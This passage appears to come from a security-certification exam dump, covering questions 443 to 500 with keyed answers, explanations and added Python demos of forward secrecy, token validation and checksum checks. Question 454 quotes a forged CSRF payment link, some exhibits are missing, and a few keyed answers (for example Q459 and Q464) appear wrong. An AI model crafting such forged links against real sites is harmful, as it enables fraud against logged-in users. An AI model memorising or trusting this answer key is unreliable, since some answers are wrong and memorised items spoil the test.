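    eavesdropper would capture (both public values per session), and the true
    session secrets (which a recorded ciphertext would be encrypted under).
    """
    server_static_priv, server_static_pub = dh_keypair()
    transcript, session_secrets = [], []
    for _ in range(n):
        if ephemeral:
            s_priv, s_pub = dh_keypair()          # fresh server value per session
        else:
            s_priv, s_pub = server_static_priv, server_static_pub
        c_priv, c_pub = dh_keypair()
        k = shared_secret(c_priv, s_pub)
        assert k == shared_secret(s_priv, c_pub)  # both sides agree
        transcript.append((s_pub, c_pub))
        session_secrets.append(k)
    return server_static_priv, transcript, session_secrets


def attacker_recovers(leaked_static_priv, transcript, session_secrets):
    """Count recorded sessions whose secret the leaked long-term key reproduces."""
    hits = 0
    for (_s_pub, c_pub), k in zip(transcript, session_secrets):
        if shared_secret(leaked_static_priv, c_pub) == k:
            hits += 1
    return hits


if __name__ == "__main__":
    for ephemeral in (False, True):
        priv, transcript, keys = run_sessions(5, ephemeral)
        print("ephemeral=%s: attacker recovers %d of %d sessions"
              % (ephemeral, attacker_recovers(priv, transcript, keys), len(keys)))
```

In the ephemeral case the long-term key still has a job, authenticating the server's handshake with a signature, but it is never an input to the session key, which is exactly the property the question describes.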
QUESTION 443
After a hardware incident, an unplanned emergency maintenance activity was conducted to
rectify the issue. Multiple alerts were generated on the SIEM during this period of time.
Which of the following BEST explains what happened?
A. The unexpected traffic correlated against multiple rules, generating multiple alerts.
B. Multiple alerts were generated due to an attack occurring at the same time.
C. An error in the correlation rules triggered multiple alerts.
D. The SIEM was unable to correlate the rules, triggering the alerts.
Answer: A
Explanation:
Maintenance = unexpected traffic and logs which can definitely trigger alerts
QUESTION 444
Which of the following environments utilizes dummy data and is MOST likely to be installed
locally on a system that allows code to be assessed directly and modified easily with each build?
A. Production
B. Test
C. Staging
D. Development
Answer: D
Explanation:
The development environment is the earliest stage of the software development life cycle
(SDLC). It is where the code is first written and tested. The development environment is typically
installed locally on a system that allows the developer to easily assess the code and make
changes.
To facilitate rapid development and testing, the development environment typically uses dummy
data. Dummy data is data that is not real but is used to represent real data. This allows the
developer to focus on the code and not have to worry about the data.
QUESTION 445
A company is implementing a new SIEM to log and send alerts whenever malicious activity is
blocked by its antivirus and web content filters.
Which of the following is the primary use case for this scenario?
A. Implementation of preventive controls
B. Implementation of detective controls
C. Implementation of deterrent controls
D. Implementation of corrective controls
Answer: B
QUESTION 446
A developer is concerned about people downloading fake malware-infected replicas of a popular
game. Which of the following should the developer do to help verify legitimate versions of the
game for users?
A. Digitally sign the relevant game files.
B. Embed a watermark using steganography.
C. Implement TLS on the license activation server.
D. Fuzz the application for unknown vulnerabilities.
Answer: A
QUESTION 447
After segmenting the network, the network manager wants to control the traffic between the
segments. Which of the following should the manager use to control the network traffic?
A. A DMZ
B. A VPN
C. A VLAN
D. An ACL
Answer: D
Explanation:
The network manager should use an Access Control List (ACL) to control the traffic between the
segments. An ACL is a network filter that can be used to control the flow of network traffic based
on various criteria, such as the source or destination of the traffic, the type of traffic, or the port
number. By configuring an ACL, the network manager can specify which types of traffic are
allowed to pass between the network segments and which are not. This will help to prevent
unauthorized or malicious traffic from passing between the segments and potentially
compromising the network. A DMZ, VPN, or VLAN would not be appropriate for controlling the
traffic between the segments in this scenario.
QUESTION 448
An organization discovered a disgruntled employee exfiltrated a large amount of PII data by
uploading files. Which of the following controls should the organization consider to mitigate this
risk?
A. EDR
B. Firewall
C. HIPS
D. DLP
Answer: D
QUESTION 449
An attack relies on an end user visiting a website the end user would typically visit; however, the
site is compromised and uses vulnerabilities in the end user's browser to deploy malicious
software. Which of the following types of attack does this describe?
A. Smishing
B. Whaling
C. Watering hole
D. Phishing
Answer: C
QUESTION 450
A Chief Security Officer (CSO) has asked a technician to devise a solution that can detect
unauthorized execution privileges from the OS in both executable and data files, and can work in
conjunction with proxies or UTM.
Which of the following would BEST meet the CSO's requirements?
A. Fuzzing
B. Sandboxing
C. Static code analysis
D. Code review
Answer: B
Explanation:
What is a sandbox?
A sandbox can be defined as an isolated environment in a computer system or on a network that
is designed and developed to mimic end user operating system (OS) and environments, so as to
detect unauthorized execution privileges from the operating system (OS).
In cybersecurity, sandboxing is typically used to safely execute suspicious code and data files
without causing any harm to the host device or network. Also, sandboxing can work in
conjunction with proxies or unified threat management (UTM).
QUESTION 451
An organization has various applications that contain sensitive data hosted in the cloud. The
company's leaders are concerned about lateral movement across applications of different trust
levels. Which of the following solutions should the organization implement to address the
concern?
A. ISFW
B. UTM
C. SWG
D. CASB
Answer: D
QUESTION 452
Drag and Drop Question
Leveraging the information supplied below, complete the CSR for the server to set up TLS
(HTTPS).
Hostname: ws01
Domain: comptia.org
IPv4: 10.1.9.50
IPv4: 10.2.10.50
Root: home.aspx
DNS CNAME: homesite
INSTRUCTIONS
Drag the various data points to the correct locations within the CSR. Extension criteria belong in
the left-hand column and values belong in the corresponding row in the right-hand column.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Answer:
QUESTION 453
Hotspot Question
A newly purchased corporate WAP needs to be configured in the MOST secure manner possible.
INSTRUCTIONS
Please click on the below items on the network diagram and configure them accordingly:
WAP
DHCP Server
AAA Server
Wireless Controller
LDAP Server
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Answer:
QUESTION 454
A forensics investigator is examining a number of unauthorized payments that were reported on
the company’s website. Some unusual log entries show users received an email for an unwanted
mailing list and clicked on a link to attempt to unsubscribe. One of the users reported the email to
the phishing team, and the forwarded email revealed the link to be:
<a href="https://www.company.com/payto.do?routing=00001111&acct=22223334&amount=250">Click here to unsubscribe</a>
Which of the following will the forensics investigator MOST likely determine has occurred?
A. SQL injection
B. Broken authentication
C. XSS
D. XSRF
Answer: D
Explanation:
XSRF (CSRF) abuses the victim's existing authenticated session. The link carries the transaction
parameters (routing number, account and amount); when the logged-in user clicks it, the browser
attaches the user's session cookie, and the site executes the payment as if the user had requested
it. Nothing is injected into the site itself, which rules out SQL injection and XSS, and the
user's credentials are never stolen, which rules out broken authentication.
QUESTION 455
Ann, a customer, received a notification from her mortgage company stating her PII may be
shared with partners, affiliates, and associates to maintain day-to-day business operations.
Which of the following documents did Ann receive?
A. An annual privacy notice
B. A non-disclosure agreement
C. A privileged-user agreement
D. A memorandum of understanding
Answer: A
Explanation:
Ann received an annual privacy notice from her mortgage company, which is sent out to
customers to inform them of their PII may be processed, shared, or stored by the company's
partners, affiliates, and associates. The notice also outlines the rights customers have with
regards to their personal data.
QUESTION 456
Which of the following would BEST identify and remediate a data-loss event in an enterprise
using third-party, web-based services and file-sharing platforms?
A. SIEM
B. CASB
C. UTM
D. EDR
Answer: B
Explanation:
A Cloud Access Security Broker (CASB) is a security solution that sits between an enterprise's
on-premises infrastructure and its cloud-based applications and services. It helps to secure the
use of these cloud-based services by providing visibility, control, and protection for data in the
cloud. A CASB can help to identify and remediate data-loss events by monitoring the use of
cloud-based services, identifying unusual or suspicious activity, and alerting the appropriate
personnel when necessary. It can also help to prevent data loss by enforcing policies to control
the access and use of data in the cloud, and by providing encryption and other security measures
to protect data in transit and at rest.
QUESTION 457
While reviewing pcap data, a network security analyst is able to locate plaintext usernames and
passwords being sent from workstations to network switches. Which of the following is the security
analyst MOST likely observing?
A. SNMP traps
B. A Telnet session
C. An SSH connection
D. SFTP traffic
Answer: B
Explanation:
Telnet has no encryption at all: the login prompt, the username and the password cross the wire as
readable text, which is exactly what shows up in a packet capture. SSH and SFTP encrypt the whole
session, and SNMP traps are one-way notifications that do not carry interactive logins.
QUESTION 458
An organization is concerned about hackers potentially entering a facility and plugging in a
remotely accessible Kali Linux box.
Which of the following should be the first lines of defense against such an attack? (Choose two.)
A. MAC filtering
B. Zero Trust segmentation
C. Network access control
D. Access control vestibules
E. Guards
F. Bollards
Answer: DE
Explanation:
The question asks for the first line of defense, not the most capable control. The attack requires
physical entry to the facility, so the controls that stop an intruder at the door, access control
vestibules and guards, come first. MAC filtering, NAC and segmentation are technical controls that
only come into play once the attacker is already inside and has plugged in the device, and
bollards stop vehicles, not people on foot.
QUESTION 459
A security analyst is hardening a network infrastructure. The analyst is given the following
requirements:
- Preserve the use of public IP addresses assigned to equipment on the
core router.
- Enable "in transport" encryption protection to the web server with
the strongest ciphers.
Which of the following should the analyst implement to meet these requirements? (Choose two.)
A. Configure VLANs on the core router
B. Configure NAT on the core router
C. Configure BGP on the core router
D. Configure AES encryption on the web server
E. Enable 3DES encryption on the web server
F. Enable TLSv2 encryption on the web server
Answer: BF
QUESTION 460
During an investigation, a security manager receives notification from local authorities that
company proprietary data was found on a former employee's home computer. The former
employee's corporate workstation has since been repurposed, and the data on the hard drive has
been overwritten.
Which of the following would BEST provide the security manager with enough details to
determine when the data was removed from the company network?
A. Properly configured hosts with security logging
B. Properly configured endpoint security tool with alerting
C. Properly configured SIEM with retention policies
D. Properly configured USB blocker with encryption
Answer: C
Explanation:
The former employee's workstation has been repurposed and its disk overwritten, so the local host
logs and any endpoint-tool history from that machine no longer exist. Only a SIEM that collected
the host and network logs centrally, and kept them under a retention policy, can still show when
the data left the company network.
QUESTION 461
The security team received a report of copyright infringement from the IP space of the corporate
network. The report provided a precise time stamp for the incident as well as the name of the
copyrighted file. The analyst has been tasked with determining the infringing source machine and
instructed to implement measures to prevent such incidents from occurring again.
Which of the following is MOST capable of accomplishing both tasks?
A. HIDS
B. Allow list
C. TPM
D. NGFW
Answer: D
Explanation:
Next Generation Firewall (NGFW) is a network firewall security device designed to filter and
inspect network and application traffic for threats, secure the network environment from intrusion,
and bring in security intelligence from outside the network.
Host-based intrusion detection system (HIDS) is designed to monitor important operating system
files. It protects systems from both internal and external threats. A host-based intrusion detection
system has less visibility than other types and operates solely within the limits of its host machine.
QUESTION 462
A company recently experienced an attack during which its main website was directed to the
attacker's web server, allowing the attacker to harvest credentials from unsuspecting customers.
Which of the following should the company implement to prevent this type of attack occurring in
the future?
A. IPSec
B. SSL/TLS
C. DNSSEC
D. S/MIME
Answer: C
QUESTION 463
A security researcher is tracking an adversary by noting its attacks and techniques based on its
capabilities, infrastructure, and victims.
Which of the following is the researcher MOST likely using?
A. The Diamond Model of Intrusion Analysis
B. The Cyber Kill Chain
C. The MITRE CVE database
D. The incident response process
Answer: A
QUESTION 464
A security analyst must enforce policies to harden an MDM infrastructure. The requirements are as
follows:
- Ensure mobile devices can be tracked and wiped.
- Confirm mobile devices are encrypted.
Which of the following should the analyst enable on all the devices to meet these requirements?
A. Geofencing
B. Biometric authentication
C. Geolocation
D. Geotagging
Answer: B
QUESTION 465
A user downloaded an extension for a browser, and the user's device later became infected. The
analyst who is investigating the incident saw various logs where the attacker was hiding activity
by deleting data. The following was observed running:
Which of the following is the malware using to execute the attack?
A. PowerShell
B. Python
C. Bash
D. Macros
Answer: A
QUESTION 466
An organization is building backup server rooms in geographically diverse locations. The Chief
Information Security Officer implemented a requirement on the project that states the new
hardware cannot be susceptible to the same vulnerabilities in the existing server room. Which of
the following should the systems engineer consider?
A. Purchasing hardware from different vendors
B. Migrating workloads to public cloud infrastructure
C. Implementing a robust patch management solution
D. Designing new detective security controls
Answer: A
Explanation:
Hardware from a different vendor runs different firmware and software, so a vulnerability in the
existing equipment does not automatically apply to the backup site. If every site runs the same
Cisco switches, for example, a flaw in that switch firmware affects all of them at once.
QUESTION 467
An engineer needs to deploy a security measure to identify and prevent data tampering within the
enterprise.
Which of the following will accomplish this goal?
A. Antivirus
B. IPS
C. FTP
D. FIM
Answer: D
Explanation:
Data tampering prevention ranges from simple measures such as encrypting data to file integrity
monitoring (FIM), which records a cryptographic hash of each protected file and alerts when the
contents change. Antivirus and an IPS look for known malicious code and traffic rather than for
arbitrary changes to data, and FTP is a transfer protocol, not a control.
https://www.cypressdatadefense.com/blog/data-tampering-prevention/
QUESTION 468
When planning to build a virtual environment, an administrator needs to achieve the following:
- Establish policies to limit who can create new VMs
- Allocate resources according to actual utilization
- Require justification for requests outside of the standard requirements
- Create standardized categories based on size and resource requirements
Which of the following is the administrator MOST likely trying to do?
A. Implement IaaS replication
B. Protect against VM escape
C. Deploy a PaaS
D. Avoid VM sprawl
Answer: D
QUESTION 469
The SIEM at an organization has detected suspicious traffic coming from a workstation in its
internal network. An analyst in the SOC investigates the workstation and discovers malware that
is associated with a botnet is installed on the device. A review of the logs on the workstation
reveals that the privileges of the local account were escalated to a local administrator. To which
of the following groups should the analyst report this real-world event?
A. The NOC team
B. The vulnerability management team
C. The CIRT
D. The red team
Answer: C
Explanation:
Also known as a “computer incident response team,” this group is responsible for responding to
security breaches, viruses and other potentially catastrophic incidents in enterprises that face
significant security risks. In addition to technical specialists capable of dealing with specific
threats, it should include experts who can guide enterprise executives on appropriate
communication in the wake of such incidents.
QUESTION 470
A security analyst has received several reports of an issue on an internal web application. Users
state they are having to provide their credentials twice to log in.
The analyst checks with the application team and notes this is not an expected behavior. After
looking at several logs, the analyst decides to run some commands on the gateway and obtains
the following output:
Which of the following BEST describes the attack the company is experiencing?
A. MAC flooding
B. URL redirection
C. ARP poisoning
D. DNS hijacking
Answer: C
QUESTION 471
While investigating a data leakage incident a security analyst reviews access control to cloud hosted data. The following information was presented in a security posture report:
- Policy to control external application integration: Admin authorized only
- 47 active integrations to third-party applications
- 2 applications authorized by admin
- 45 applications authorized by users
- 32 OAuth apps authorized to access data
Based on the report, which of the following was the MOST likely attack vector used against the
company?
A. Spyware
B. Logic bomb
C. Potentially unwanted programs
D. Supply chain
Answer: A
QUESTION 472
Which of the following corporate policies is used to help prevent employee fraud and to detect
system log modifications or other malicious activity based on tenure?
A. Background checks
B. Mandatory vacation
C. Social media analysis
D. Separation of duties
Answer: B
QUESTION 473
Which of the following holds staff accountable while escorting unauthorized personnel?
A. Locks
B. Badges
C. Cameras
D. Visitor logs
Answer: B
QUESTION 474
An analyst is generating a security report for the management team. Security guidelines
recommend disabling all listening unencrypted services. Given this output from Nmap:
Which of the following should the analyst recommend to disable?
A. 21/tcp
B. 22/tcp
C. 23/tcp
D. 443/tcp
Answer: C
Explanation:
Telnet is a client-server remote-login protocol that listens on TCP port 23. It provides no
encryption, so logins and the whole session are sent as plain text; SSH (22/tcp) and HTTPS
(443/tcp) are the encrypted services in the list.
QUESTION 475
A security analyst is investigating a malware incident at a company. The malware is accessing a
command-and-control website at www.comptia.com. All outbound Internet traffic is logged to a
syslog server and stored in /logfiles/messages.
Which of the following commands would be BEST for the analyst to use on the syslog server to
search for recent traffic to the command-and-control website?
A. Option A
B. Option B
C. Option C
D. Option D
Answer: C
QUESTION 476
Which of the following function as preventive, detective, and deterrent controls to reduce the risk
of physical theft? (Choose two.)
A. Mantraps
B. Security guards
C. Video surveillance
D. Fences
E. Bollards
F. Antivirus
Answer: BC
QUESTION 477
The Chief Information Security Officer wants to pilot a new adaptive, user-based authentication
method. The concept includes granting logical access based on physical location and proximity.
Which of the following is the BEST solution for the pilot?
A. Geofencing
B. Self-sovereign identification
C. PKI certificates
D. SSO
Answer: A
QUESTION 478
A Chief Information Officer receives an email stating a database will be encrypted within 24 hours
unless a payment of $20,000 is credited to the account mentioned in the email. This BEST
describes a scenario related to:
A. Whaling
B. Smishing
C. Spear phishing
D. Vishing
Answer: A
QUESTION 479
A cyber threat intelligence analyst is gathering data about a specific adversary using OSINT
techniques.
Which of the following should the analyst use?
A. Internal log files
B. Government press releases
C. Confidential reports
D. Proprietary databases
Answer: B
Explanation:
Open-source intelligence (OSINT) is built from publicly available sources such as government
press releases, news reporting, public records and open forums. Internal log files, confidential
reports and proprietary databases are closed sources and do not count as OSINT. In fraud
investigation, for example, OSINT lets analysts spot fraud toolkits and methods being sold or
shared on public forums and marketplaces and uncover leads in near real time.
QUESTION 480
Which of the following would satisfy three-factor authentication?
A. Password, retina scanner, and NFC card
B. Password, fingerprint scanner, and retina scanner
C. Password, hard token, and NFC card
D. Fingerprint scanner, hard token, and retina scanner
Answer: A
QUESTION 481
Which two features are available only in next-generation firewalls? (Choose two)
A. Deep packet inspection
B. Packet filtering
C. Application awareness
D. Stateful inspection
E. Virtual private network
Answer: AC
Explanation:
Deep packet inspection (DPI) is a technology that allows a firewall to examine the contents of
network packets. This allows the firewall to identify and block malicious traffic that may not be
detected by traditional firewalls that only inspect the headers of network packets.
Application awareness is a technology that allows a firewall to understand the applications that
are running on a network. This allows the firewall to identify and block malicious traffic that is
targeting specific applications.
QUESTION 482
A developer is building a new portal to deliver single-pane-of-glass management capabilities to
customers with multiple firewalls.
To improve the user experience, the developer wants to implement an authentication and
authorization standard that uses security tokens that contain assertions to pass user information
between nodes.
Which of the following roles should the developer configure to meet these requirements? (Choose
two.)
A. Identity processor
B. Service requestor
C. Identity provider
D. Service provider
E. Tokenized resource
F. Notarized referral
Answer: CD
Explanation:
An identity provider (IdP) is a trusted third party that provides authentication services to other
parties, such as the portal in this case. The IdP authenticates users and issues security tokens
that contain assertions about the user's identity.
A service provider (SP) is a party that provides services to users. The SP uses the security
tokens issued by the IdP to authenticate users and grant them access to its services.
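The two roles in the exchange, as an added example in Python that is not code from the page or
from any SAML library. It is a deliberately simplified model: a real SAML assertion is XML signed
with the IdP's private key (XML-DSig) and checked by the SP against the IdP's public key from
metadata; here an HMAC with a shared key stands in for that signature, and the issuer, audience and
key values are hypothetical. What it does show is the order of checks the SP must perform:
signature first, then issuer, audience and expiry, before trusting any claim.

```python
import base64
import binascii
import hashlib
import hmac
import json
import time

# Hypothetical endpoints and key for the demo (not from the page).
IDP_ISSUER = "https://idp.example.com"
SP_AUDIENCE = "https://portal.example.com"
SHARED_KEY = b"demo-idp-sp-key-change-me"  # stand-in for the IdP's signing key


def _b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64d(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _canonical(claims):
    # Stable serialisation so the signed bytes are reproducible.
    return json.dumps(claims, sort_keys=True, separators=(",", ":")).encode()


def idp_issue_token(subject, roles, now=None, ttl=300, key=SHARED_KEY):
    """IdP side: after authenticating the user (out of scope here), issue a signed assertion."""
    now = int(time.time()) if now is None else now
    claims = {"iss": IDP_ISSUER, "sub": subject, "aud": SP_AUDIENCE,
              "iat": now, "exp": now + ttl, "roles": roles}
    body = _canonical(claims)
    sig = hmac.new(key, body, hashlib.sha256).digest()
    return f"{_b64e(body)}.{_b64e(sig)}"


def sp_validate_token(token, now=None, key=SHARED_KEY):
    """SP side: verify the signature before reading any claim, then issuer, audience, expiry.
    Returns (claims, 'ok') or (None, reason)."""
    now = int(time.time()) if now is None else now
    try:
        body_b64, sig_b64 = token.split(".")
        body, sig = _b64d(body_b64), _b64d(sig_b64)
    except (ValueError, binascii.Error):
        return None, "malformed token"
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None, "bad signature"
    claims = json.loads(body)
    if claims.get("iss") != IDP_ISSUER:
        return None, "unknown issuer"
    if claims.get("aud") != SP_AUDIENCE:
        return None, "token not issued for this service provider"
    if now >= claims.get("exp", 0):
        return None, "expired"
    return claims, "ok"


def demo():
    t0 = 1_700_000_000  # fixed clock so the results are reproducible
    token = idp_issue_token("ann@example.com", ["firewall-admin"], now=t0)
    claims, status = sp_validate_token(token, now=t0 + 60)

    # Tampering: rewrite the roles claim but keep the original signature.
    body_b64, sig_b64 = token.split(".")
    forged = json.loads(_b64d(body_b64))
    forged["roles"] = ["superadmin"]
    tampered = f"{_b64e(_canonical(forged))}.{sig_b64}"
    _, tampered_status = sp_validate_token(tampered, now=t0 + 60)
    _, expired_status = sp_validate_token(token, now=t0 + 600)
    return {"status": status, "sub": claims["sub"], "roles": claims["roles"],
            "tampered": tampered_status, "expired": expired_status}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The audience check is the one most often skipped in practice: without it, a token the IdP issued
for one service provider can be replayed to another that trusts the same IdP.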
QUESTION 483
A security analyst was deploying a new website and found a connection attempting to
authenticate on the site's portal.
While investigating the incident, the analyst identified the following input in the username field:
Which of the following BEST explains this type of attack?
A. DLL injection to hijack administrator services
B. SQLi on the field to bypass authentication
C. Execution of a stored XSS on the website
D. Code to execute a race condition on the server
Answer: B
QUESTION 484
Which of the following uses six initial steps that provide basic control over system security by
including hardware and software inventory, vulnerability management, and continuous monitoring
to minimize risk in all network environments?
A. ISO 27701
B. The Center for Internet Security
C. SSAE SOC 2
D. NIST Risk Management Framework
Answer: B
Explanation:
The first six CIS Controls (inventory of hardware assets, inventory of software assets, continuous
vulnerability management, controlled use of administrative privileges, secure configuration, and
maintenance, monitoring and analysis of audit logs) form the "basic" group that gives an
organization a baseline of system security. ISO 27701 is a privacy management standard, SOC 2 is
an audit reporting framework, and the NIST RMF is a process for managing risk rather than a list
of technical controls.
QUESTION 485
Developers are writing code and merging it into shared repositories several times a day, where it
is tested automatically. Which of the following concepts does this BEST represent?
A. Functional testing
B. Stored procedures
C. Elasticity
D. Continuous integration
Answer: D
Explanation:
Continuous Integration (CI) is a development practice where developers integrate code into a
shared repository frequently, preferably several times a day. Each integration can then be verified
by an automated build and automated tests.
QUESTION 486
Which of the following environments would MOST likely be used to assess the execution of
component parts of a system at both the hardware and software levels and to measure
performance characteristics?
A. Test
B. Staging
C. Development
D. Production
Answer: A
QUESTION 487
Remote workers in an organization use company-provided laptops with locally installed
applications and locally stored data. Users can store data on a remote server using an encrypted
connection. The organization discovered data stored on a laptop had been made available to the
public. Which of the following security solutions would mitigate the risk of future data disclosures?
A. FDE
B. TPM
C. HIDS
D. VPN
Answer: A
QUESTION 488
Which of the following describes a maintenance metric that measures the average time required
to troubleshoot and restore failed equipment?
A. RTO
B. MTBF
C. MTTR
D. RPO
Answer: C
Explanation:
Mean time to repair (MTTR) is a measure of the maintainability of a repairable item, which tells
the average time required to repair a specific item or component and return it to working status. It
is a basic measure of the maintainability of equipment and parts. This includes the notification
time, diagnosis and the time spent on actual repair as well as other activities required before the
equipment can be used again. Mean time to repair is also known as mean repair time.
https://www.techopedia.com/definition/2719/mean-time-to-repair-mttr
QUESTION 489
Which of the following is a difference between a DRP and a BCP?
A. A BCP keeps operations running during a disaster while a DRP does not.
B. A BCP prepares for any operational interruption while a DRP prepares for natural disasters.
C. A BCP is a technical response to disasters while a DRP is operational.
D. A BCP is formally written and approved while a DRP is not.
Answer: A
Explanation:
A business continuity plan covers keeping the business operating through a disruption; a disaster
recovery plan is the narrower, largely technical plan for recovering IT systems and data after a
disaster. Option C has the two reversed, and neither plan is limited to natural disasters.
QUESTION 490
A grocery store is expressing security and reliability concerns regarding the on-site backup
strategy currently being performed by locally attached disks. The main concerns are the physical
security of the backup media and the durability of the data stored on these devices.
Which of the following is a cost-effective approach to address these concerns?
A. Enhance resiliency by adding a hardware RAID.
B. Move data to a tape library and store the tapes off site.
C. Install a local network-attached storage.
D. Migrate to a cloud backup solution.
Answer: D
QUESTION 491
A systems administrator is looking for a solution that will help prevent OAuth applications from
being leveraged by hackers to trick users into authorizing the use of their corporate credentials.
Which of the following BEST describes this solution?
A. CASB
B. UEM
C. WAF
D. VPC
Answer: A
Explanation:
A cloud access security broker sits between users and the organization's SaaS applications and can
enforce policy on which third-party OAuth applications may be granted access to corporate
accounts, blocking the consent-phishing applications described here. A WAF protects the
organization's own web applications from attacks on their input, UEM manages endpoints, and a VPC
is a network construct; none of them controls OAuth consent.
QUESTION 492
Which of the following is an example of risk avoidance?
A. Installing security updates directly in production to expedite vulnerability fixes
B. Buying insurance to prepare for financial loss associated with exploits
C. Not installing new software to prevent compatibility errors
D. Not taking preventive measures to stop the theft of equipment
Answer: C
Explanation:
Risk avoidance means choosing not to do the thing that carries the risk, which is what declining to
install the software does. Installing updates straight into production skips testing and accepts
the risk of an untested change; buying insurance is risk transference; and not taking preventive
measures against theft is risk acceptance.
QUESTION 493
Which of the following BEST describes the method a security analyst would use to confirm a file
that is downloaded from a trusted security website is not altered in transit or corrupted using a
verified checksum?
A. Hashing
B. Salting
C. Integrity
D. Digital signature
Answer: A
Explanation:
A checksum is a hash of the file. The analyst computes the same hash over the downloaded copy and
compares it with the published value; any change in transit or corruption on disk produces a
different digest. Hashing on its own proves integrity only against accidental change: if the
checksum is served over the same channel as the file, an attacker who can replace the file can
replace the checksum too, which is the gap a digital signature over the hash closes. Salting is a
password-storage technique, and integrity is the property being checked, not the method.
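The check itself, as an added example in Python rather than code from the page: parse a
sha256sum-style SUMS file, hash the downloaded file in chunks, and compare in constant time. The
"download" and the SUMS file are constructed inside the demo, and the file name scanner-1.4.2.bin
is hypothetical.

```python
import hashlib
import hmac
import re
import tempfile
from pathlib import Path

# One line of a sha256sum/md5sum file: '<hexdigest>  <filename>' or '<hexdigest> *<filename>'.
SUM_LINE = re.compile(r"^([0-9A-Fa-f]{32,128})\s+\*?(.+)$")


def file_digest(path, algo="sha256", chunk=1 << 16):
    """Hash a file in chunks so a large download does not have to fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def parse_sums(text):
    """Parse a SUMS file into {filename: lowercase hex digest}; '#' lines and junk are skipped."""
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = SUM_LINE.match(line)
        if m:
            sums[m.group(2)] = m.group(1).lower()
    return sums


def verify_download(path, sums, algo="sha256"):
    """True only if the file's digest equals the published one (constant-time compare)."""
    expected = sums.get(Path(path).name)
    if expected is None:
        return False  # no published checksum: do not trust the file
    actual = file_digest(path, algo)
    return hmac.compare_digest(actual.encode(), expected.encode())


def demo():
    """Constructed download plus a SHA256SUMS file; returns (intact_ok, tampered_ok)."""
    payload = b"\x7fELF" + bytes(range(256)) * 8  # stand-in for a downloaded binary
    published = f"# SHA256SUMS (constructed)\n{hashlib.sha256(payload).hexdigest()}  scanner-1.4.2.bin\n"
    with tempfile.TemporaryDirectory() as d:
        f = Path(d) / "scanner-1.4.2.bin"
        f.write_bytes(payload)
        sums = parse_sums(published)
        intact = verify_download(f, sums)
        f.write_bytes(payload[:-1] + b"\x00")  # one byte altered in transit
        tampered = verify_download(f, sums)
    return intact, tampered


if __name__ == "__main__":
    print("intact verifies: %s, tampered verifies: %s" % demo())
```

Get the SUMS file (or the digest) from a second channel, such as a signed release page or a
detached signature, so that the comparison means more than "both files came from the same mirror".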
QUESTION 494
A bad actor tries to persuade someone to provide financial information over the phone in order to
gain access to funds. Which of the following types of attacks does this scenario describe?
A. Vishing
B. Phishing
C. Spear phishing
D. Whaling
Answer: A
QUESTION 495
During an incident, an EDR system detects an increase in the number of encrypted outbound
connections from multiple hosts. A firewall is also reporting an increase in outbound connections
that use random high ports. An analyst plans to review the correlated logs to find the source of
the incident. Which of the following tools will BEST assist the analyst?
A. A vulnerability scanner
B. A NGFW
C. The Windows Event Viewer
D. A SIEM
Answer: D
QUESTION 496
Which of the following threat actors is MOST likely to be motivated by ideology?
A. Business competitor
B. Hacktivist
C. Criminal syndicate
D. Script kiddie
E. Disgruntled employee
Answer: B
QUESTION 497
A company wants to deploy systems alongside production systems in order to entice threat actors
and to learn more about attackers. Which of the following BEST describe these systems?
A. DNS sinkholes
B. Honeypots
C. Virtual machines
D. Neural network
Answer: B
Explanation:
A honeypot is a network-attached system set up as a decoy to lure cyber attackers and to detect,
deflect and study attempts to gain unauthorized access to information systems. It presents itself
on the network as a plausible target, usually a server or other high-value asset, gathers
information about what attackers do to it, and notifies defenders of any attempt to access it,
since no legitimate user has a reason to.
QUESTION 498
A new security engineer has started hardening systems. One of the hardening techniques the
engineer is using involves disabling remote logins to the NAS. Users are now reporting the
inability to use SCP to transfer files to the NAS, even though the data is still viewable from the
users' PCs. Which of the following is the MOST likely cause of this issue?
A. TFTP was disabled on the local hosts
B. SSH was turned off instead of modifying the configuration file
C. Remote login was disabled in the networkd.config instead of using the sshd.conf
D. Network services are no longer running on the NAS
Answer: B
Explanation:
The most likely cause of the issue is that SSH was turned off instead of modifying the
configuration file. SSH (Secure Shell) is a commonly used protocol for securely accessing and
managing remote systems, including network-attached storage (NAS) devices. Disabling remote
logins to the NAS would most likely involve modifying the configuration file for the SSH service
(sshd.conf), not disabling SSH itself. If SSH was turned off, it would prevent users from accessing
the NAS over the network, including using SCP (Secure Copy Protocol) to transfer files. This
would result in the inability to use SCP to transfer files to the NAS, even though the data is still
viewable from the users’ PCs.
QUESTION 499
Customers reported their antivirus software flagged one of the company's primary software
products as suspicious. The company's Chief Information Security Officer has tasked the
developer with determining a method to create a trust model between the software and the
customer's antivirus software. Which of the following would be the BEST solution?
A. Code signing
B. Domain validation
C. Extended validation
D. Self-signing
Answer: A
Explanation:
Code signing lets the vendor sign its binaries with a certificate that chains to a CA the
customer's platform already trusts; antivirus and operating-system reputation services use the
signature and the signer's identity to decide that the software is trustworthy. Domain validation
and extended validation describe how thoroughly a CA vets a certificate subject and do not by
themselves create a trust relationship between a binary and endpoint security software, and a
self-signed certificate chains to nothing the customer trusts.
QUESTION 500
Users reported several suspicious activities within the last two weeks that resulted in several
unauthorized transactions. Upon investigation, the security analyst found the following:
- Multiple reports of breached credentials within that time period
- Traffic being redirected in certain parts of the network
- Fraudulent emails being sent by various internal users without their
consent
Which of the following types of attacks was MOST likely used?
A. Replay attack
B. Race condition
C. Cross-site scripting
D. Request forgeries
Answer: D
Explanation:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted
actions on a web application in which they’re currently authenticated. With a little help of social
engineering (such as sending a link via email or chat), an attacker may trick the users of a web
application into executing actions of the attacker’s choosing. If the victim is a normal user, a
successful CSRF attack can force the user to perform state changing requests like transferring
funds, changing their email address, and so forth. If the victim is an administrative account, CSRF
can compromise the entire web application.
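The forgery from the unsubscribe link in Question 454 and the request forgeries in Question 500,
modelled in Python as an added example that is not code from the page or from any framework. The
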